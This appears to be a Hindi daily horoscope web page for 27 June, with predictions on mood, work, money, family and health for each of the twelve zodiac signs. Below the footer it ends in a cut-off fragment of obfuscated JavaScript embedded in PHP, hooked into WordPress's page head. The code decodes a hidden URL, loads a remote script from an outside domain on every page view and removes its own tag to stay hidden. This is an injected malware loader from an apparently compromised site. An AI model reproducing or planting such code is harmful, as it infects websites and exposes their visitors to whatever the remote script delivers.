Saturday, July 27, 2024
spot_img

27 जून राशिफल– आज तुला राशि वाले जातक रहें सावधान, इन कष्टों से हो सकता हैं सामना, मीन राशि वालों को भी इन कुछ खास उपायों से मिल सकता हैं लाभ

मेष राशि- आज आपके आत्मविश्वास में वृद्धि होगी। पूरा दिन वाणी में मधुरता रहेगी। फिर भी परिवार में सदभाव बनाये रखें। नौकरी में परिवर्तन के योग बन रहे हैं। आय वृद्धि होगी। क्रोध के अतिरेक से बचने का प्रयास करें आपके लिए बेहतर होगा। वाणी में कठोरता का प्रभाव हो सकता है। परिवार की स्थिति में सुधार होगा। तरक्की के मार्ग प्रशस्त होंगे। यात्रा पर जाना पड़ सकता है। सेहत का ध्यान रखें। संबंधों में मधुरता आएगी।

वृष राशि- आज आप जीवनसाथी के स्वास्थ्य से परेशान हो सकते हैं। बौद्धिक कार्यों से आय में वृद्धि होगी। उपहार मिल सकते हैं। मन में सकारात्मकता का प्रभाव हो सकता है,सकारात्मकता के लिए प्रयास करें। आज आप पूरा दिन आत्मविश्वास से परिपूर्ण रहेंगे। किसी मित्र का आगमन हो सकता है। वाहन सुख में वृद्धि के योग बन रहे हैं। माता का सानिध्य मिल सकता है। आत्मसंयत रहें। मित्रों का सहयोग मिलेगा।

मिथुन राशि- आज आपका मन अशान्त रहेगा, शांति के लिए प्रयास करें। धैर्यशीलता में कमी रहेगी, धैर्य बनाकर रखें। परिवार के साथ किसी धार्मिक स्थान की यात्रा का कार्यक्रम बन सकता है। अपने स्वास्थ्य का ध्यान रखें। खर्च बढ़ सकते हैं। अपनी भावनाओं पर नियन्त्रण रखें, आपके लिए बेहतर होगा। कार्य़क्षेत्र में कठिनाइयां आएंगी। माता से धन की प्राप्ति होगी। मित्रों के सहयोग से कारोबार के तरक्की के मार्ग प्रशस्त होंगे। धैर्य बनाएं रखें।

कर्क राशि- आज आपके अन्दर आशा-निराशा के मिश्रित भाव हो सकते हैं। नौकरी के लिए परीक्षा एवं साक्षात्कारादि कार्यों में सफलता मिलेगी। शासन-सत्ता का सहयोग मिलेगा। आत्मविश्वास में वृद्धि होगी। क्षणे रुष्टा-क्षणे तुष्टा के भाव रहेंगे। कुछ पुराने मित्रों से पुनः सम्पर्क हो सकते हैं। खानपान में दिलचस्पी बढ़ेगी। शैक्षिक कार्यों में कठिनाइयां आ सकती हैं। खर्च अधिक रहेंगे, फिजूलखर्ची में नियंत्रण रखें।

सिंह राशि- आज आपके भवन सुख में वृद्धि हो सकती है। परिवार में सुख-शान्ति रहेगी। किसी बुजुर्ग से धन की प्राप्ति हो सकती है। भाग-दौड़ अधिक रहेगी। शिक्षा में व्यवधान आ सकते हैं। परिवार की जिम्मेदारी बढ़ सकती हैं। आत्मविश्वास से परिपूर्ण रहेंगे, परन्तु अति उत्साही होने से बचें। नौकरी में स्थान परिवर्तन के योग बन रहे हैं। माता से वैचारिक मतभेद हो सकते हैं, बातचीत में संयम बरतें।

कन्या राशि- आज आप पूरा दिन आत्मविश्वास से लबरेज रहेंगे। नौकरी में पदोन्नति की प्राप्ति हो सकती है। मान-सम्मान में वृद्धि होगी। शासन का सहयोग मिलेगा। परिश्रम अधिक रहेगा। आत्मसंयत रहें। क्रोध के अतिरेक से बचने का प्रयास करें, आपके लिए बेहतर होगा। मन में नकारात्मक विचारों का प्रभाव हो सकता है,सकारात्मकता के लिए प्रयास करें। क्षणे रुष्टा क्षणे तुष्टा के भाव मन में रहेंगे। माता-पिता से आर्थिक सहयोग मिल सकता है। बातचीत में संयत रहें।


तुला राशि-आज आपका मन अशान्त रहेगा, शांति के लिए प्रयास करें। संयत रहें। कारोबार में परिवर्तन की सम्भावना बन रही हैं। किसी मित्र का सहयोग मिल सकता है। लाभ के अवसर मिलेंगे। धैर्यशीलता में कमी रहेगी, धैर्य बनाकर रखें। बातचीत में संयत रहें। आज आपको कारोबार में विपरीत परिस्थितियों का सामना करना पड़ सकता है। क्रोध की अधिकता रहेगी। जीवनसाथी से वैचारिक मतभेद हो सकते हैं। वस्त्रों के प्रति रुझान बढ़ेगा।

वृश्चिक राशि- आज आप स्वास्थ्य के प्रति सचेत रहें। सन्तान सुख में वृद्धि होगी। किसी पुराने मित्र से पुनः सम्पर्क हो सकता है। खर्च बढ़ेंगे। आज आपके अन्दर आशा-निराशा के मिश्रित भाव मन में बने रहेंगे। पिता से वैचारिक मतभेद हो सकते हैं, बातचीत में संयम बरतें। नकारात्मक विचारों का प्रभाव रहेगा। मित्र के सहयोग से कारोबार का विस्तार हो सकता है। नौकरी में तरक्की के अवसर मिल सकते हैं।

धनु राशि- आज आप मानसिक शान्ति बनाये रखने के प्रयास करें। किसी मित्र के सहयोग से नौकरी के अवसर मिल सकते हैं। आय में वृद्धि होगी, आर्थिक स्थिति में सुधार होग, लेकिन खर्च भी बढ़ेंगे। मन में नकारात्मक विचारों का प्रभाव रहेगा,सकारात्मकता के लिए प्रयास करें। आत्मविश्वास में कमी आएगी। अपनी भावनाओं को वश में रखें। रोजमर्रा के कार्यों में कठिनाइयां आ सकती हैं। भाइयों का सहयोग मिलेगा। सेहत का ध्यान रखें।

मकर राशि- आज आपको कारोबार के लिए विदेश यात्रा के योग बन रहे हैं। यात्रा लाभप्रद रहेगी। परिवार एवं मित्रों का सहयोग मिलेगा। आत्मविश्वास में परिपूर्ण रहेंगे, परन्तु मन में नकारात्मकता का प्रभाव हो सकता है, सकारात्मकता के लिए प्रयास करें।आज आपका मन अशान्त रहेगा, शांति के लिए प्रयास करें। क्रोध की अधिकता रहेगी, बातचीत में संयम बरतें। किसी सम्पत्ति या भवन से आय के स्रोत विकसित हो सकते हैं। जीवनसाथी का सहयोग मिलेगा। सुखद समाचार मिलेगा।

कुंभ राशि- आज आपके अन्दर आत्मविश्वास रहेगा, परन्तु मन परेशान हो सकता है। मानसिक शान्ति के लिए प्रयास करें। नौकरी में कार्यक्षेत्र में बदलाव हो सकता है। परिवार में कलहपूर्ण स्थिति हो सकती है। आय कम एवं खर्च अधिक की स्थिति से परेशान रहेंगे। स्वभाव में चिड़चिड़ापन रहेगा। व्यर्थ के झगड़े एवं विवादों से दूर रहने का प्रयास करें, आपके लिए बेहतर होगा। धार्मिक कार्यों में व्यस्तता हो सकती है, धार्मिक गतिविधियों में शामिल होंगे।

मीन राशि- आज आपकी पठन-पाठन में रुचि बढ़ेगी। शैक्षिक कार्यों के सुखद परिणाम मिलेंगे। किसी पैतृक सम्पत्ति से धन मिल सकता है। कारोबार में वृद्धि होगी। खर्च अधिक रहेंगे, फिजूलखर्ची में नियंत्रण रखें। आत्मविश्वास में कमी आएगी। कार्यक्षेत्र की स्थिति में सुधार होगा। परिश्रम की अधिकता बनी रहेगी। मित्रों का सहयोग मिलेगा। मानसिक शान्ति रहेगी। सन्तान की ओर से सुखद समाचार मिल सकते हैं।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>